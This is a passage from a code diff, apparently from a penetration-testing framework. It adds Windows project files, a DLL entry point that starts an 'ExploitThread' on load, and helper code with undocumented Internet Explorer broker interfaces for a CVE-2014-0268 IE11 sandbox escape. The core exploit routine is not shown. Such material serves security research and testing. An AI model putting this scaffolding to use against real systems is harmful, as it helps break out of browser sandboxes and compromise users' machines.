<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="CVE-2014-0268.cpp" />
<ClCompile Include="dllmain.cpp">
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
</PrecompiledHeader>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged>
<CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj">
<Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

23
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/dllmain.cpp vendored Executable file
View File

@ -0,0 +1,23 @@
// dllmain.cpp : Defines the entry point for the DLL application.
#include "stdafx.h"
DWORD CALLBACK ExploitThread(LPVOID hModule);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

8
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.cpp vendored Executable file
View File

@ -0,0 +1,8 @@
// stdafx.cpp : source file that includes just the standard includes
// CVE-2014-0268.pch will be the pre-compiled header
// stdafx.obj will contain the pre-compiled type information
#include "stdafx.h"
// TODO: reference any additional headers you need in STDAFX.H
// and not in this file

11
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/stdafx.h vendored Executable file
View File

@ -0,0 +1,11 @@
// stdafx.h : include file for standard system include files,
// or project specific include files that are used frequently, but
// are changed infrequently
//
#pragma once
#include "targetver.h"
#include <windows.h>
#include <Utils.h>

8
external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/targetver.h vendored Executable file
View File

@ -0,0 +1,8 @@
#pragma once
// Including SDKDDKVer.h defines the highest available Windows platform.
// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
#include <SDKDDKVer.h>

154
external/source/exploits/IE11SandboxEscapes/CommonUtils/CommonUtils.vcxproj vendored Executable file
View File

@ -0,0 +1,154 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{04DDE547-BB65-4C0C-B80B-231DF42C7A1D}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>CommandUtils</RootNamespace>
<ProjectName>CommonUtils</ProjectName>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>StaticLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup />
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Windows</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="regln.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
<ClInclude Include="Utils.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="regln.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">NotUsing</PrecompiledHeader>
</ClCompile>
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="Utils.cpp" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

373
external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.cpp vendored Executable file
View File

@ -0,0 +1,373 @@
// This file is part of IE11SandboxEsacapes.
// IE11SandboxEscapes is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// IE11SandboxEscapes is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>.
#include "stdafx.h"
#include "Utils.h"
#include <strsafe.h>
#include <sddl.h>
#include <Shlwapi.h>
#pragma comment(lib, "shlwapi.lib")
static BOOL g_hasShDocIID;
static IID g_shDocIID;
BOOL GetIIDForName(LPCWSTR lpName, IID* riid)
{
HKEY hRoot = nullptr;
ULONG status;
status = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"Interface", 0, KEY_ENUMERATE_SUB_KEYS, &hRoot);
if (status == 0)
{
WCHAR keyName[128];
DWORD index = 0;
BOOL foundKey = FALSE;
while (true)
{
HKEY hSubKey;
status = RegEnumKeyW(hRoot, index, keyName, _countof(keyName));
if (status != 0)
{
break;
}
index++;
status = RegOpenKeyEx(hRoot, keyName, 0, KEY_QUERY_VALUE, &hSubKey);
if (status != 0)
{
continue;
}
DWORD dwType;
WCHAR valueName[256];
DWORD dwSize = sizeof(valueName)-sizeof(WCHAR);
status = RegQueryValueEx(hSubKey, nullptr, nullptr, &dwType, (BYTE*)valueName, &dwSize);
RegCloseKey(hSubKey);
if ((status != 0) || (dwType != REG_SZ))
{
continue;
}
// Ensure NUL terminate
valueName[dwSize / sizeof(WCHAR)] = 0;
if (_wcsicmp(valueName, lpName) == 0)
{
foundKey = TRUE;
break;
}
}
RegCloseKey(hRoot);
if (foundKey)
{
return SUCCEEDED(IIDFromString(keyName, riid));
}
}
else
{
DebugPrintf("Could not open Interface key %d\n", status);
}
return FALSE;
}
REFIID GetSHDocIID()
{
if (!g_hasShDocIID)
{
memset(&g_shDocIID, 0, sizeof(g_shDocIID));
g_hasShDocIID;
GetIIDForName(L"ISHDocVwBroker", &g_shDocIID);
}
return g_shDocIID;
}
bstr_t GetTemp(LPCWSTR name)
{
WCHAR tempPath[MAX_PATH];
GetTempPath(MAX_PATH, tempPath);
PathAppend(tempPath, name);
return tempPath;
}
bstr_t GetTempPath()
{
WCHAR tempPath[MAX_PATH];
GetTempPath(MAX_PATH, tempPath);
return tempPath;
}
bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len)
{
WCHAR tempPath[MAX_PATH];
GetTempPath(MAX_PATH, tempPath);
PathAppend(tempPath, name);
FILE* fp = nullptr;
if (_wfopen_s(&fp, tempPath, L"wb") == 0)
{
fwrite(buf, 1, len, fp);
fclose(fp);
return tempPath;
}
else
{
return L"";
}
}
std::vector<unsigned char> ReadFileToMem(LPCWSTR name)
{
FILE* fp;
std::vector<unsigned char> ret;
if (_wfopen_s(&fp, name, L"rb") == 0)
{
fseek(fp, 0, SEEK_END);
ret.resize(ftell(fp));
fseek(fp, 0, SEEK_SET);
fread(&ret[0], 1, ret.size(), fp);
fclose(fp);
}
return ret;
}
void DebugPrintf(LPCSTR lpFormat, ...)
{
#ifdef _DEBUG
CHAR buf[1024];
va_list va;
va_start(va, lpFormat);
StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);
OutputDebugStringA(buf);
#endif
}
bstr_t GetUserSid()
{
HANDLE hToken = nullptr;
PTOKEN_USER pUser = nullptr;
LPWSTR userName = nullptr;
bstr_t ret;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken))
{
DebugPrintf("Error opening process token: %d", GetLastError());
goto error;
}
//TOKEN_USER user = { 0 };
DWORD retLength = 0;
if (!GetTokenInformation(hToken, TokenUser, nullptr, 0, &retLength))
{
if (GetLastError() != ERROR_INSUFFICIENT_BUFFER)
{
DebugPrintf("Error getting token information size: %d", GetLastError());
goto error;
}
}
pUser = (PTOKEN_USER) new char[retLength];
if (!GetTokenInformation(hToken, TokenUser, pUser, retLength, &retLength))
{
DebugPrintf("Error getting token information: %d", GetLastError());
goto error;
}
if (!ConvertSidToStringSidW(pUser->User.Sid, &userName))
{
DebugPrintf("Error converting Sid to String: %d", GetLastError());
goto error;
}
ret = userName;
error:
if (hToken)
{
CloseHandle(hToken);
}
if (pUser)
{
delete[] pUser;
}
if (userName)
{
LocalFree(userName);
}
return ret;
}
typedef HRESULT(__stdcall *fCoCreateUserBroker)(IIEUserBroker** ppBroker);
GUID CLSID_CShdocvwBroker = { 0x9C7A1728,
0x0B694, 0x427A, { 0x94, 0xA2, 0xA1, 0xB2, 0xC6, 0x0F, 0x03, 0x60 } };
void DisableImpersonation(IUnknown* pUnk)
{
IClientSecurity* sec = nullptr;
HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
if (SUCCEEDED(hr))
{
hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_ANONYMOUS, nullptr, EOAC_NONE);
DebugPrintf("SetBlanket: %08X", hr);
sec->Release();
}
else
{
DebugPrintf("Error getting client security: %08X", hr);
}
}
void SetCloaking(IUnknown* pUnk)
{
IClientSecurity* sec = nullptr;
HRESULT hr = pUnk->QueryInterface(IID_PPV_ARGS(&sec));
if (SUCCEEDED(hr))
{
hr = sec->SetBlanket(pUnk, RPC_C_AUTHN_DEFAULT, RPC_C_AUTHZ_DEFAULT, nullptr, RPC_C_AUTHN_LEVEL_DEFAULT,
RPC_C_IMP_LEVEL_IDENTIFY, nullptr, EOAC_DYNAMIC_CLOAKING);
DebugPrintf("SetBlanket: %08X", hr);
sec->Release();
}
else
{
DebugPrintf("Error getting client security: %08X", hr);
}
}
IIEUserBrokerPtr CreateBroker()
{
HMODULE hMod = LoadLibrary(L"iertutil.dll");
fCoCreateUserBroker pfCoCreateUserBroker = (fCoCreateUserBroker)GetProcAddress(hMod, (LPCSTR)58);
if (pfCoCreateUserBroker)
{
IIEUserBrokerPtr broker;
HRESULT ret = pfCoCreateUserBroker(&broker);
DebugPrintf("CreateBroker: %08X - %p", ret, broker);
return broker;
}
return nullptr;
}
IShdocvwBroker* CreateSHDocVw()
{
IIEUserBrokerPtr broker = CreateBroker();
if (broker != nullptr)
{
HRESULT ret;
IShdocvwBroker* shdocvw;
ret = broker->BrokerCreateKnownObject(CLSID_CShdocvwBroker, GetSHDocIID(), (IUnknown**)&shdocvw);
DebugPrintf("IShdocvwBroker: %08X %p", ret, shdocvw);
if (SUCCEEDED(ret))
{
return shdocvw;
}
}
return nullptr;
}
bstr_t GetWindowsSystemDirectory()
{
WCHAR buf[MAX_PATH];
GetSystemDirectory(buf, MAX_PATH);
return buf;
}
bstr_t GetExecutableFileName(HMODULE hModule)
{
WCHAR buf[MAX_PATH];
::GetModuleFileNameW(hModule, buf, MAX_PATH);
return buf;
}
bstr_t GetSessionPath()
{
std::wstringstream ss;
WCHAR objPath[MAX_PATH + 1] = { 0 };
ULONG length = MAX_PATH;
DWORD dwSessionId;
if (ProcessIdToSessionId(GetCurrentProcessId(), &dwSessionId))
{
ss << L"\\Sessions\\" << dwSessionId;
return ss.str().c_str();
}
return L"";
}
LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString)
{
return RegSetValueEx(hKey, lpName, 0, REG_SZ, (const BYTE*)lpString, (wcslen(lpString) + 1) * sizeof(WCHAR));
}
LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d)
{
return RegSetValueEx(hKey, lpName, 0, REG_DWORD, (const BYTE*)&d, sizeof(d));
}

21
external/source/exploits/IE11SandboxEscapes/CommonUtils/Utils.h vendored Executable file
View File

@ -0,0 +1,21 @@
#include "interfaces.h"
#include <vector>
bstr_t GetTemp(LPCWSTR name);
bstr_t GetTempPath();
bstr_t WriteTempFile(LPCWSTR name, unsigned char* buf, size_t len);
std::vector<unsigned char> ReadFileToMem(LPCWSTR name);
void DebugPrintf(LPCSTR lpFormat, ...);
bstr_t GetUserSid();
void DisableImpersonation(IUnknown* pUnk);
void SetCloaking(IUnknown* pUnk);
IIEUserBrokerPtr CreateBroker();
IShdocvwBroker* CreateSHDocVw();
bstr_t GetWindowsSystemDirectory();
bstr_t GetExecutableFileName(HMODULE hModule);
extern "C" int DeleteLink(LPCWSTR par_src);
extern "C" int CreateLink(LPCWSTR par_src, LPCWSTR par_dst, int opt_volatile);
bstr_t GetSessionPath();
LSTATUS CreateRegistryValueString(HKEY hKey, LPCWSTR lpName, LPCWSTR lpString);
LSTATUS CreateRegistryValueDword(HKEY hKey, LPCWSTR lpName, DWORD d);

258
external/source/exploits/IE11SandboxEscapes/CommonUtils/interfaces.h vendored Executable file
View File

@ -0,0 +1,258 @@
#pragma once
#include <tchar.h>
#include <Windows.h>
#include <comdef.h>
#include <Shtypes.h>
#include <DocObj.h>
struct __declspec(uuid("1AC7516E-E6BB-4A69-B63F-E841904DC5A6")) IIEUserBroker : IUnknown
{
virtual HRESULT STDMETHODCALLTYPE Initialize(HWND *, LPCWSTR, LPDWORD) = 0;
virtual HRESULT STDMETHODCALLTYPE CreateProcessW(DWORD pid, LPWSTR appName, LPWSTR cmdline, DWORD, DWORD, LPCSTR, WORD*, /* _BROKER_STARTUPINFOW*/ void *, /* _BROKER_PROCESS_INFORMATION */ void*) = 0;
virtual HRESULT STDMETHODCALLTYPE WinExec(DWORD pid, LPCSTR, DWORD, DWORD*) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerCreateKnownObject(_GUID const &, _GUID const &, IUnknown * *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstance() = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerCoCreateInstanceEx(DWORD pid, _GUID const &, IUnknown *, DWORD, _COSERVERINFO *, DWORD, /* tagBROKER_MULTI_QI */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE BrokerCoGetClassObject(DWORD pid, _GUID const &, DWORD, _COSERVERINFO *, _GUID const &, IUnknown * *) = 0;
};
struct __declspec(uuid("BDB57FF2-79B9-4205-9447-F5FE85F37312")) CIEAxInstallBroker
{
};
struct __declspec(uuid("B2103BDB-B79E-4474-8424-4363161118D5")) IIEAxInstallBrokerBroker : IUnknown
{
virtual HRESULT STDMETHODCALLTYPE BrokerGetAxInstallBroker(REFCLSID rclsid, REFIID riid, int unknown, int type, HWND, IUnknown** ppv) = 0;
};
_COM_SMARTPTR_TYPEDEF(IIEAxInstallBrokerBroker, __uuidof(IIEAxInstallBrokerBroker));
struct ERF
{
//+0x000 erfOper : Int4B
// + 0x004 erfType : Int4B
// + 0x008 fError : Int4B
int erfOper;
int erfType;
int fError;
};
struct FNAME
{
/*+0x000 pszFilename : Ptr32 Char
+ 0x004 pNextName : Ptr32 sFNAME
+ 0x008 status : Uint4B*/
char* pszFilenane;
FNAME* pNextName;
UINT status;
};
struct SESSION
{
/*+0x000 cbCabSize : Uint4B
+ 0x004 erf : ERF
+ 0x010 pFileList : Ptr32 sFNAME
+ 0x014 cFiles : Uint4B
+ 0x018 flags : Uint4B
+ 0x01c achLocation : [260] Char
+ 0x120 achFile : [260] Char
+ 0x224 achCabPath : [260] Char
+ 0x328 pFilesToExtract : Ptr32 sFNAME*/
UINT cbCabSize;
ERF erf;
FNAME* pFileList;
UINT cFiles;
UINT flags;
char achLocation[260];
char achFile[260];
char achCabPath[260];
FNAME* pFilesToExtract;
};
struct __declspec(uuid("BC0EC710-A3ED-4F99-B14F-5FD59FDACEA3")) IIeAxiInstaller2 : IUnknown
{
virtual HRESULT STDMETHODCALLTYPE VerifyFile(BSTR, HWND__ *, BSTR, BSTR, BSTR, unsigned int, unsigned int, _GUID const &, BSTR*, unsigned int *, unsigned char **) = 0;
virtual HRESULT STDMETHODCALLTYPE RunSetupCommand(BSTR, HWND__ *, BSTR, BSTR, BSTR, BSTR, unsigned int, unsigned int *) = 0;
virtual HRESULT STDMETHODCALLTYPE InstallFile(BSTR sessionGuid, HWND__ *, BSTR sourcePath, BSTR sourceFile, BSTR destPath, BSTR destFile, unsigned int unk) = 0;
virtual HRESULT STDMETHODCALLTYPE RegisterExeFile(BSTR sessionGuid, BSTR cmdline, int unk, _PROCESS_INFORMATION *) = 0;
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile(BSTR, BSTR, int) = 0;
virtual HRESULT STDMETHODCALLTYPE InstallCatalogFile(BSTR, BSTR) = 0;
virtual HRESULT STDMETHODCALLTYPE UpdateLanguageCheck(BSTR, unsigned short const *, _FILETIME) = 0;
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
virtual HRESULT STDMETHODCALLTYPE UpdateModuleUsage(BSTR, char const *, char const *, char const *, char const *, unsigned int) = 0;
virtual HRESULT STDMETHODCALLTYPE EnumerateFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
virtual HRESULT STDMETHODCALLTYPE ExtractFiles(BSTR sessionGuid, char const * cabPath, SESSION *session) = 0;
virtual HRESULT STDMETHODCALLTYPE RemoveExtractedFilesAndDirs(BSTR, SESSION *) = 0;
virtual HRESULT STDMETHODCALLTYPE CreateExtensionsManager(BSTR, _GUID const &, IUnknown * *) = 0;
virtual HRESULT STDMETHODCALLTYPE RegisterDllFile2(BSTR, BSTR, int, int) = 0;
virtual HRESULT STDMETHODCALLTYPE UpdateDistributionUnit2(BSTR, unsigned short const *, unsigned short const *, unsigned int, unsigned int *, unsigned short const *, int, unsigned short const *, unsigned short const *, long, unsigned short const *, unsigned short const *, unsigned short const *, unsigned int, unsigned short const * *, int *, unsigned int, unsigned short const * *, unsigned int, unsigned short const * *, unsigned short const * *) = 0;
virtual HRESULT STDMETHODCALLTYPE UpdateAllowedDomainsList(_GUID const &, BSTR, int) = 0;
virtual HRESULT STDMETHODCALLTYPE DeleteExtractedFile(char const *) = 0;
};
_COM_SMARTPTR_TYPEDEF(IIeAxiInstaller2, __uuidof(IIeAxiInstaller2));
struct __declspec(uuid("9AEA8A59-E0C9-40F1-87DD-757061D56177")) IIeAxiAdminInstaller : IUnknown
{
virtual HRESULT STDMETHODCALLTYPE InitializeAdminInstaller(BSTR, BSTR, BSTR*) = 0;
};
_COM_SMARTPTR_TYPEDEF(IIeAxiAdminInstaller, __uuidof(IIeAxiAdminInstaller));
struct __declspec(uuid("A4AAAE00-22E5-4742-ABB7-379D9493A3B7")) IShdocvwBroker : IUnknown
{
virtual HRESULT STDMETHODCALLTYPE RedirectUrl(WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void*) = 0;
virtual HRESULT STDMETHODCALLTYPE RedirectShortcut(WORD const *, WORD const *, DWORD, /* _BROKER_REDIRECT_DETAIL */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE RedirectUrlWithBindInfo(/* _BROKER_BIND_INFO */ void *, /* _BROKER_REDIRECT_DETAIL */ void *, /* IXMicTestMode */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE NavigateUrlInNewTabInstance(/* _BROKER_BIND_INFO */ void *, /*_BROKER_REDIRECT_DETAIL */ void *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptions(HWND *, WORD const *, WORD const *, long, ITEMIDLIST_ABSOLUTE * *, DWORD, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsZones(HWND *, WORD const *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowInternetOptionsLanguages(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowPopupManager(HWND *, WORD const *) = 0;
virtual HRESULT STDMETHODCALLTYPE ShowCachesAndDatabases(HWND *) = 0;
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupExemption(HWND *, int, WORD const *, int *) = 0;
virtual HRESULT STDMETHODCALLTYPE ConfigurePopupMgr(HWND *, int) = 0;
virtual HRESULT STDMETHODCALLTYPE RemoveFirstHomePage(void) = 0;
virtual HRESULT STDMETHODCALLTYPE SetHomePage(HWND *, long, ITEMIDLIST_ABSOLUTE * *, long) = 0;
